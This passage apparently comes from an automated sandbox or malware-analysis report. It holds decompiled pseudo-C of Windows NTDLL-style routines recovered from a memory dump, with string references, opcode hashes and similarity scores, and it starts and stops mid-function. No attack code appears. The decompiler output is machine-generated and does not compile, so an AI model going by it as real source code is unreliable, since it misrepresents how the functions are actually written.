                                                                                      				_t17 = __ecx;
                                                                                      				if(_t25 == 0) {
                                                                                      					_t19 = 0xc00000f2;
                                                                                      					L8:
                                                                                      					return _t19;
                                                                                      				}
                                                                                      				if((__ecx & 0xfffffffe) != 0) {
                                                                                      					_t19 = 0xc00000ef;
                                                                                      					goto L8;
                                                                                      				}
                                                                                      				_t19 = 0;
                                                                                      				 *_t25 = 0;
                                                                                      				_t21 = 0;
                                                                                      				_t23 = "Actx ";
                                                                                      				if(__edx != 0) {
                                                                                      					if(__edx == 0xfffffffc) {
                                                                                      						L21:
                                                                                      						_t21 = 0x200;
                                                                                      						L5:
                                                                                      						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                                                      						 *_t25 = _t13;
                                                                                      						L6:
                                                                                      						if(_t13 == 0) {
                                                                                      							if((_t17 & 0x00000001) != 0) {
                                                                                      								 *_t25 = _t23;
                                                                                      							}
                                                                                      						}
                                                                                      						L7:
                                                                                      						goto L8;
                                                                                      					}
                                                                                      					if(__edx == 0xfffffffd) {
                                                                                      						 *_t25 = _t23;
                                                                                      						_t13 = _t23;
                                                                                      						goto L6;
                                                                                      					}
                                                                                      					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                                                      					 *_t25 = _t13;
                                                                                      					L14:
                                                                                      					if(_t21 == 0) {
                                                                                      						goto L6;
                                                                                      					}
                                                                                      					goto L5;
                                                                                      				}
                                                                                      				_t14 = _a4;
                                                                                      				if(_t14 != 0) {
                                                                                      					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                                                      					if(_t16 <= 1) {
                                                                                      						_t21 = 0x1f8;
                                                                                      						_t13 = 0;
                                                                                      						goto L14;
                                                                                      					}
                                                                                      					if(_t16 == 2) {
                                                                                      						goto L21;
                                                                                      					}
                                                                                      					if(_t16 != 4) {
                                                                                      						_t19 = 0xc00000f0;
                                                                                      						goto L7;
                                                                                      					}
                                                                                      					_t13 = 0;
                                                                                      					goto L6;
                                                                                      				} else {
                                                                                      					_t21 = 0x1f8;
                                                                                      					goto L5;
                                                                                      				}
                                                                                      			}












                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Actx
                                                                                      • API String ID: 0-89312691
                                                                                      • Opcode ID: 9d2df01b3188c9530f91be732d1258c1dc013408d04efdedcea8c75470f9944e
                                                                                      • Instruction ID: c5ea72c6aa861c1c4f19f3028517c2f99abd05aa28cbb457f0d5a9954675ab7e
                                                                                      • Opcode Fuzzy Hash: 9d2df01b3188c9530f91be732d1258c1dc013408d04efdedcea8c75470f9944e
                                                                                      • Instruction Fuzzy Hash: 4311E23430560A8BEB254E1CC9907F6F6B5AB95234FA7457AE467CB391DB70C8438340
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 71%
                                                                                      			E01868DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                      				intOrPtr _t35;
                                                                                      				void* _t41;
                                                                                      
                                                                                      				_t40 = __esi;
                                                                                      				_t39 = __edi;
                                                                                      				_t38 = __edx;
                                                                                      				_t35 = __ecx;
                                                                                      				_t34 = __ebx;
                                                                                      				_push(0x74);
                                                                                      				_push(0x1890d50);
                                                                                      				E0180D0E8(__ebx, __edi, __esi);
                                                                                      				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                                                      				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                                                      					E01845720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                                                      					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                                                      						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                                      						asm("int3");
                                                                                      						 *(_t41 - 4) = 0xfffffffe;
                                                                                      					}
                                                                                      				}
                                                                                      				 *(_t41 - 4) = 1;
                                                                                      				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                                                      				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                                                      				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                                                      				 *((intOrPtr*)(_t41 - 0x64)) = L0180DEF0;
                                                                                      				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                                                      				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                                                      				_push(_t41 - 0x70);
                                                                                      				L0180DEF0(1, _t38);
                                                                                      				 *(_t41 - 4) = 0xfffffffe;
                                                                                      				return E0180D130(_t34, _t39, _t40);
                                                                                      			}






                                                                                      Strings
                                                                                      • Critical error detected %lx, xrefs: 01868E21
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Critical error detected %lx
                                                                                      • API String ID: 0-802127002
                                                                                      • Opcode ID: ee25b9eeb8545ab39fcebd5f0d3c201982b83f65349beacd16598cbfceb9ad01
                                                                                      • Instruction ID: 19702784297af732aedd603f05a89a57fcdef0c4faa78e5fae277321d42b5ffb
                                                                                      • Opcode Fuzzy Hash: ee25b9eeb8545ab39fcebd5f0d3c201982b83f65349beacd16598cbfceb9ad01
                                                                                      • Instruction Fuzzy Hash: 3E1135B5D15348DBDF25CFE8890679CBBB4AB15314F24426EE569AB282C7344B02CF15
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0184FF60
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                      • API String ID: 0-1911121157
                                                                                      • Opcode ID: 4b6162e8d35eaab5f4011db87fce06a16fc90e65ca325814c580dad745e2432d
                                                                                      • Instruction ID: 048d73d0b37550b1b9ab8c81af6ff105f69a2417ee43d64f392f4bce411a911d
                                                                                      • Opcode Fuzzy Hash: 4b6162e8d35eaab5f4011db87fce06a16fc90e65ca325814c580dad745e2432d
                                                                                      • Instruction Fuzzy Hash: 1711E171910548EFEB22DB98CC49F98BBB1FB18704F548058E208E72A1CF399B40CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 88%
                                                                                      			E01885BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                      				signed int _t296;
                                                                                      				signed char _t298;
                                                                                      				signed int _t301;
                                                                                      				signed int _t306;
                                                                                      				signed int _t310;
                                                                                      				signed char _t311;
                                                                                      				intOrPtr _t312;
                                                                                      				signed int _t313;
                                                                                      				void* _t327;
                                                                                      				signed int _t328;
                                                                                      				intOrPtr _t329;
                                                                                      				intOrPtr _t333;
                                                                                      				signed char _t334;
                                                                                      				signed int _t336;
                                                                                      				void* _t339;
                                                                                      				signed int _t340;
                                                                                      				signed int _t356;
                                                                                      				signed int _t362;
                                                                                      				short _t367;
                                                                                      				short _t368;
                                                                                      				short _t373;
                                                                                      				signed int _t380;
                                                                                      				void* _t382;
                                                                                      				short _t385;
                                                                                      				signed short _t392;
                                                                                      				signed char _t393;
                                                                                      				signed int _t395;
                                                                                      				signed char _t397;
                                                                                      				signed int _t398;
                                                                                      				signed short _t402;
                                                                                      				void* _t406;
                                                                                      				signed int _t412;
                                                                                      				signed char _t414;
                                                                                      				signed short _t416;
                                                                                      				signed int _t421;
                                                                                      				signed char _t427;
                                                                                      				intOrPtr _t434;
                                                                                      				signed char _t435;
                                                                                      				signed int _t436;
                                                                                      				signed int _t442;
                                                                                      				signed int _t446;
                                                                                      				signed int _t447;
                                                                                      				signed int _t451;
                                                                                      				signed int _t453;
                                                                                      				signed int _t454;
                                                                                      				signed int _t455;
                                                                                      				intOrPtr _t456;
                                                                                      				intOrPtr* _t457;
                                                                                      				short _t458;
                                                                                      				signed short _t462;
                                                                                      				signed int _t469;
                                                                                      				intOrPtr* _t474;
                                                                                      				signed int _t475;
                                                                                      				signed int _t479;
                                                                                      				signed int _t480;
                                                                                      				signed int _t481;
                                                                                      				short _t485;
                                                                                      				signed int _t491;
                                                                                      				signed int* _t494;
                                                                                      				signed int _t498;
                                                                                      				signed int _t505;
                                                                                      				intOrPtr _t506;
                                                                                      				signed short _t508;
                                                                                      				signed int _t511;
                                                                                      				void* _t517;
                                                                                      				signed int _t519;
                                                                                      				signed int _t522;
                                                                                      				void* _t523;
                                                                                      				signed int _t524;
                                                                                      				void* _t528;
                                                                                      				signed int _t529;
                                                                                      
                                                                                      				_push(0xd4);
                                                                                      				_push(0x1891178);
                                                                                      				E0180D0E8(__ebx, __edi, __esi);
                                                                                      				_t494 = __edx;
                                                                                      				 *(_t528 - 0xcc) = __edx;
                                                                                      				_t511 = __ecx;
                                                                                      				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                                                      				 *(_t528 - 0xbc) = __ecx;
                                                                                      				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                                                      				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                                                      				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                                                      				_t427 = 0;
                                                                                      				 *(_t528 - 0x74) = 0;
                                                                                      				 *(_t528 - 0x9c) = 0;
                                                                                      				 *(_t528 - 0x84) = 0;
                                                                                      				 *(_t528 - 0xac) = 0;
                                                                                      				 *(_t528 - 0x88) = 0;
                                                                                      				 *(_t528 - 0xa8) = 0;
                                                                                      				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                                                      				if( *(_t528 + 0x1c) <= 0x80) {
                                                                                      					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                                                      					if(__eflags != 0) {
                                                                                      						_t421 = E01884C56(0, __edx, __ecx, __eflags);
                                                                                      						__eflags = _t421;
                                                                                      						if(_t421 != 0) {
                                                                                      							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                                                      							E017FD000(0x410);
                                                                                      							 *(_t528 - 0x18) = _t529;
                                                                                      							 *(_t528 - 0x9c) = _t529;
                                                                                      							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                                                      							E01885542(_t528 - 0x9c, _t528 - 0x84);
                                                                                      						}
                                                                                      					}
                                                                                      					_t435 = _t427;
                                                                                      					 *(_t528 - 0xd0) = _t435;
                                                                                      					_t474 = _t511 + 0x65;
                                                                                      					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                      					_t511 = 0x18;
                                                                                      					while(1) {
                                                                                      						 *(_t528 - 0xa0) = _t427;
                                                                                      						 *(_t528 - 0xbc) = _t427;
                                                                                      						 *(_t528 - 0x80) = _t427;
                                                                                      						 *(_t528 - 0x78) = 0x50;
                                                                                      						 *(_t528 - 0x79) = _t427;
                                                                                      						 *(_t528 - 0x7a) = _t427;
                                                                                      						 *(_t528 - 0x8c) = _t427;
                                                                                      						 *(_t528 - 0x98) = _t427;
                                                                                      						 *(_t528 - 0x90) = _t427;
                                                                                      						 *(_t528 - 0xb0) = _t427;
                                                                                      						 *(_t528 - 0xb8) = _t427;
                                                                                      						_t296 = 1 << _t435;
                                                                                      						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                                                      						__eflags = _t436 & _t296;
                                                                                      						if((_t436 & _t296) != 0) {
                                                                                      							goto L92;
                                                                                      						}
                                                                                      						__eflags =  *((char*)(_t474 - 1));
                                                                                      						if( *((char*)(_t474 - 1)) == 0) {
                                                                                      							goto L92;
                                                                                      						}
                                                                                      						_t301 =  *_t474;
                                                                                      						__eflags = _t494[1] - _t301;
                                                                                      						if(_t494[1] <= _t301) {
                                                                                      							L10:
                                                                                      							__eflags =  *(_t474 - 5) & 0x00000040;
                                                                                      							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                                                      								L12:
                                                                                      								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                                                      								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                                                      									goto L92;
                                                                                      								}
                                                                                      								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                                                      								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                                                      								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                                                      									goto L92;
                                                                                      								}
                                                                                      								__eflags = _t442 -  *(_t474 - 0x11);
                                                                                      								if(_t442 !=  *(_t474 - 0x11)) {
                                                                                      									goto L92;
                                                                                      								}
                                                                                      								L15:
                                                                                      								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                                                      								 *(_t528 - 0xc0) = _t306;
                                                                                      								 *(_t528 - 0xa4) = _t306;
                                                                                      								__eflags =  *0x18a60e8;
                                                                                      								if( *0x18a60e8 != 0) {
                                                                                      									__eflags = _t306 - 0x40;
                                                                                      									if(_t306 < 0x40) {
                                                                                      										L20:
                                                                                      										asm("lock inc dword [eax]");
                                                                                      										_t310 =  *0x18a60e8; // 0x0
                                                                                      										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                                                      										__eflags = _t311 & 0x00000001;
                                                                                      										if((_t311 & 0x00000001) == 0) {
                                                                                      											 *(_t528 - 0xa0) = _t311;
                                                                                      											_t475 = _t427;
                                                                                      											 *(_t528 - 0x74) = _t427;
                                                                                      											__eflags = _t475;
                                                                                      											if(_t475 != 0) {
                                                                                      												L91:
                                                                                      												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                      												goto L92;
                                                                                      											}
                                                                                      											asm("sbb edi, edi");
                                                                                      											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                                                      											_t511 = _t498;
                                                                                      											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                      											__eflags =  *(_t312 - 5) & 1;
                                                                                      											if(( *(_t312 - 5) & 1) != 0) {
                                                                                      												_push(_t528 - 0x98);
                                                                                      												_push(0x4c);
                                                                                      												_push(_t528 - 0x70);
                                                                                      												_push(1);
                                                                                      												_push(0xfffffffa);
                                                                                      												_t412 = E017F9710();
                                                                                      												_t475 = _t427;
                                                                                      												__eflags = _t412;
                                                                                      												if(_t412 >= 0) {
                                                                                      													_t414 =  *(_t528 - 0x98) - 8;
                                                                                      													 *(_t528 - 0x98) = _t414;
                                                                                      													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                                                      													 *(_t528 - 0x8c) = _t416;
                                                                                      													 *(_t528 - 0x79) = 1;
                                                                                      													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                                                      													__eflags = _t511;
                                                                                      												}
                                                                                      											}
                                                                                      											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                                                      											__eflags = _t446 & 0x00000004;
                                                                                      											if((_t446 & 0x00000004) != 0) {
                                                                                      												__eflags =  *(_t528 - 0x9c);
                                                                                      												if( *(_t528 - 0x9c) != 0) {
                                                                                      													 *(_t528 - 0x7a) = 1;
                                                                                      													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                                                      													__eflags = _t511;
                                                                                      												}
                                                                                      											}
                                                                                      											_t313 = 2;
                                                                                      											_t447 = _t446 & _t313;
                                                                                      											__eflags = _t447;
                                                                                      											 *(_t528 - 0xd4) = _t447;
                                                                                      											if(_t447 != 0) {
                                                                                      												_t406 = 0x10;
                                                                                      												_t511 = _t511 + _t406;
                                                                                      												__eflags = _t511;
                                                                                      											}
                                                                                      											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                                                      											 *(_t528 - 0x88) = _t427;
                                                                                      											__eflags =  *(_t528 + 0x1c);
                                                                                      											if( *(_t528 + 0x1c) <= 0) {
                                                                                      												L45:
                                                                                      												__eflags =  *(_t528 - 0xb0);
                                                                                      												if( *(_t528 - 0xb0) != 0) {
                                                                                      													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                      													__eflags = _t511;
                                                                                      												}
                                                                                      												__eflags = _t475;
                                                                                      												if(_t475 != 0) {
                                                                                      													asm("lock dec dword [ecx+edx*8+0x4]");
                                                                                      													goto L100;
                                                                                      												} else {
                                                                                      													_t494[3] = _t511;
                                                                                      													_t451 =  *(_t528 - 0xa0);
                                                                                      													_t427 = E017F6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                                                      													 *(_t528 - 0x88) = _t427;
                                                                                      													__eflags = _t427;
                                                                                      													if(_t427 == 0) {
                                                                                      														__eflags = _t511 - 0xfff8;
                                                                                      														if(_t511 <= 0xfff8) {
                                                                                      															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                                                      															asm("sbb ecx, ecx");
                                                                                      															__eflags = (_t451 & 0x000000e2) + 8;
                                                                                      														}
                                                                                      														asm("lock dec dword [eax+edx*8+0x4]");
                                                                                      														L100:
                                                                                      														goto L101;
                                                                                      													}
                                                                                      													_t453 =  *(_t528 - 0xa0);
                                                                                      													 *_t494 = _t453;
                                                                                      													_t494[1] = _t427;
                                                                                      													_t494[2] =  *(_t528 - 0xbc);
                                                                                      													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                                                      													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                                                      													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                                                      													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                                                      													asm("movsd");
                                                                                      													asm("movsd");
                                                                                      													asm("movsd");
                                                                                      													asm("movsd");
                                                                                      													asm("movsd");
                                                                                      													asm("movsd");
                                                                                      													asm("movsd");
                                                                                      													asm("movsd");
                                                                                      													__eflags =  *(_t528 + 0x14);
                                                                                      													if( *(_t528 + 0x14) == 0) {
                                                                                      														__eflags =  *[fs:0x18] + 0xf50;
                                                                                      													}
                                                                                      													asm("movsd");
                                                                                      													asm("movsd");
                                                                                      													asm("movsd");
                                                                                      													asm("movsd");
                                                                                      													__eflags =  *(_t528 + 0x18);
                                                                                      													if( *(_t528 + 0x18) == 0) {
                                                                                      														_t454 =  *(_t528 - 0x80);
                                                                                      														_t479 =  *(_t528 - 0x78);
                                                                                      														_t327 = 1;
                                                                                      														__eflags = 1;
                                                                                      													} else {
                                                                                      														_t146 = _t427 + 0x50; // 0x50
                                                                                      														_t454 = _t146;
                                                                                      														 *(_t528 - 0x80) = _t454;
                                                                                      														_t382 = 0x18;
                                                                                      														 *_t454 = _t382;
                                                                                      														 *((short*)(_t454 + 2)) = 1;
                                                                                      														_t385 = 0x10;
                                                                                      														 *((short*)(_t454 + 6)) = _t385;
                                                                                      														 *(_t454 + 4) = 0;
                                                                                      														asm("movsd");
                                                                                      														asm("movsd");
                                                                                      														asm("movsd");
                                                                                      														asm("movsd");
                                                                                      														_t327 = 1;
                                                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                      														_t479 = 0x68;
                                                                                      														 *(_t528 - 0x78) = _t479;
                                                                                      													}
                                                                                      													__eflags =  *(_t528 - 0x79) - _t327;
                                                                                      													if( *(_t528 - 0x79) == _t327) {
                                                                                      														_t524 = _t479 + _t427;
                                                                                      														_t508 =  *(_t528 - 0x8c);
                                                                                      														 *_t524 = _t508;
                                                                                      														_t373 = 2;
                                                                                      														 *((short*)(_t524 + 2)) = _t373;
                                                                                      														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                                                      														 *((short*)(_t524 + 4)) = 0;
                                                                                      														_t167 = _t524 + 8; // 0x8
                                                                                      														E017FF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                                                      														_t529 = _t529 + 0xc;
                                                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                      														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                                                      														 *(_t528 - 0x78) = _t479;
                                                                                      														_t380 =  *(_t528 - 0x80);
                                                                                      														__eflags = _t380;
                                                                                      														if(_t380 != 0) {
                                                                                      															_t173 = _t380 + 4;
                                                                                      															 *_t173 =  *(_t380 + 4) | 1;
                                                                                      															__eflags =  *_t173;
                                                                                      														}
                                                                                      														_t454 = _t524;
                                                                                      														 *(_t528 - 0x80) = _t454;
                                                                                      														_t327 = 1;
                                                                                      														__eflags = 1;
                                                                                      													}
                                                                                      													__eflags =  *(_t528 - 0xd4);
                                                                                      													if( *(_t528 - 0xd4) == 0) {
                                                                                      														_t505 =  *(_t528 - 0x80);
                                                                                      													} else {
                                                                                      														_t505 = _t479 + _t427;
                                                                                      														_t523 = 0x10;
                                                                                      														 *_t505 = _t523;
                                                                                      														_t367 = 3;
                                                                                      														 *((short*)(_t505 + 2)) = _t367;
                                                                                      														_t368 = 4;
                                                                                      														 *((short*)(_t505 + 6)) = _t368;
                                                                                      														 *(_t505 + 4) = 0;
                                                                                      														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                                                      														_t327 = 1;
                                                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                      														_t479 = _t479 + _t523;
                                                                                      														 *(_t528 - 0x78) = _t479;
                                                                                      														__eflags = _t454;
                                                                                      														if(_t454 != 0) {
                                                                                      															_t186 = _t454 + 4;
                                                                                      															 *_t186 =  *(_t454 + 4) | 1;
                                                                                      															__eflags =  *_t186;
                                                                                      														}
                                                                                      														 *(_t528 - 0x80) = _t505;
                                                                                      													}
                                                                                      													__eflags =  *(_t528 - 0x7a) - _t327;
                                                                                      													if( *(_t528 - 0x7a) == _t327) {
                                                                                      														 *(_t528 - 0xd4) = _t479 + _t427;
                                                                                      														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                                                      														E017FF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                                                      														_t529 = _t529 + 0xc;
                                                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                      														_t479 =  *(_t528 - 0x78) + _t522;
                                                                                      														 *(_t528 - 0x78) = _t479;
                                                                                      														__eflags = _t505;
                                                                                      														if(_t505 != 0) {
                                                                                      															_t199 = _t505 + 4;
                                                                                      															 *_t199 =  *(_t505 + 4) | 1;
                                                                                      															__eflags =  *_t199;
                                                                                      														}
                                                                                      														_t505 =  *(_t528 - 0xd4);
                                                                                      														 *(_t528 - 0x80) = _t505;
                                                                                      													}
                                                                                      													__eflags =  *(_t528 - 0xa8);
                                                                                      													if( *(_t528 - 0xa8) != 0) {
                                                                                      														_t356 = _t479 + _t427;
                                                                                      														 *(_t528 - 0xd4) = _t356;
                                                                                      														_t462 =  *(_t528 - 0xac);
                                                                                      														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                                                      														_t485 = 0xc;
                                                                                      														 *((short*)(_t356 + 2)) = _t485;
                                                                                      														 *(_t356 + 6) = _t462;
                                                                                      														 *((short*)(_t356 + 4)) = 0;
                                                                                      														_t211 = _t356 + 8; // 0x9
                                                                                      														E017FF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                                                      														E017FFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                                                      														_t529 = _t529 + 0x18;
                                                                                      														_t427 =  *(_t528 - 0x88);
                                                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                      														_t505 =  *(_t528 - 0xd4);
                                                                                      														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                                                      														 *(_t528 - 0x78) = _t479;
                                                                                      														_t362 =  *(_t528 - 0x80);
                                                                                      														__eflags = _t362;
                                                                                      														if(_t362 != 0) {
                                                                                      															_t222 = _t362 + 4;
                                                                                      															 *_t222 =  *(_t362 + 4) | 1;
                                                                                      															__eflags =  *_t222;
                                                                                      														}
                                                                                      													}
                                                                                      													__eflags =  *(_t528 - 0xb0);
                                                                                      													if( *(_t528 - 0xb0) != 0) {
                                                                                      														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                                                      														_t458 = 0xb;
                                                                                      														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                                                      														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                                                      														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                                                      														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                                                      														E017FFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                                                      														_t529 = _t529 + 0xc;
                                                                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                      														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                                                      														 *(_t528 - 0x78) = _t479;
                                                                                      														__eflags = _t505;
                                                                                      														if(_t505 != 0) {
                                                                                      															_t241 = _t505 + 4;
                                                                                      															 *_t241 =  *(_t505 + 4) | 1;
                                                                                      															__eflags =  *_t241;
                                                                                      														}
                                                                                      													}
                                                                                      													_t328 =  *(_t528 + 0x1c);
                                                                                      													__eflags = _t328;
                                                                                      													if(_t328 == 0) {
                                                                                      														L87:
                                                                                      														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                                                      														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                                                      														_t455 =  *(_t528 - 0xdc);
                                                                                      														 *(_t427 + 0x14) = _t455;
                                                                                      														_t480 =  *(_t528 - 0xa0);
                                                                                      														_t517 = 3;
                                                                                      														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                                                      														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                                                      															asm("rdtsc");
                                                                                      															 *(_t427 + 0x3c) = _t480;
                                                                                      														} else {
                                                                                      															 *(_t427 + 0x3c) = _t455;
                                                                                      														}
                                                                                      														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                                                      														_t456 =  *[fs:0x18];
                                                                                      														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                                                      														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                                                      														_t427 = 0;
                                                                                      														__eflags = 0;
                                                                                      														_t511 = 0x18;
                                                                                      														goto L91;
                                                                                      													} else {
                                                                                      														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                                                      														__eflags = _t519;
                                                                                      														 *(_t528 - 0x8c) = _t328;
                                                                                      														do {
                                                                                      															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                                                      															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                                                      															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                                                      															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                                                      															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                                                      															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                                                      																_t334 =  *_t519;
                                                                                      															} else {
                                                                                      																_t334 = 0;
                                                                                      															}
                                                                                      															_t336 = _t334 & 0x000000ff;
                                                                                      															__eflags = _t336;
                                                                                      															_t427 =  *(_t528 - 0x88);
                                                                                      															if(_t336 == 0) {
                                                                                      																_t481 = _t479 + _t506;
                                                                                      																__eflags = _t481;
                                                                                      																 *(_t528 - 0x78) = _t481;
                                                                                      																E017FF3E0(_t479 + _t427, _t457, _t506);
                                                                                      																_t529 = _t529 + 0xc;
                                                                                      															} else {
                                                                                      																_t340 = _t336 - 1;
                                                                                      																__eflags = _t340;
                                                                                      																if(_t340 == 0) {
                                                                                      																	E017FF3E0( *(_t528 - 0xb8), _t457, _t506);
                                                                                      																	_t529 = _t529 + 0xc;
                                                                                      																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                                                      																} else {
                                                                                      																	__eflags = _t340 == 0;
                                                                                      																	if(_t340 == 0) {
                                                                                      																		__eflags = _t506 - 8;
                                                                                      																		if(_t506 == 8) {
                                                                                      																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                                                      																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                                                      																		}
                                                                                      																	}
                                                                                      																}
                                                                                      															}
                                                                                      															_t339 = 0x10;
                                                                                      															_t519 = _t519 + _t339;
                                                                                      															_t263 = _t528 - 0x8c;
                                                                                      															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                                                      															__eflags =  *_t263;
                                                                                      															_t479 =  *(_t528 - 0x78);
                                                                                      														} while ( *_t263 != 0);
                                                                                      														goto L87;
                                                                                      													}
                                                                                      												}
                                                                                      											} else {
                                                                                      												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
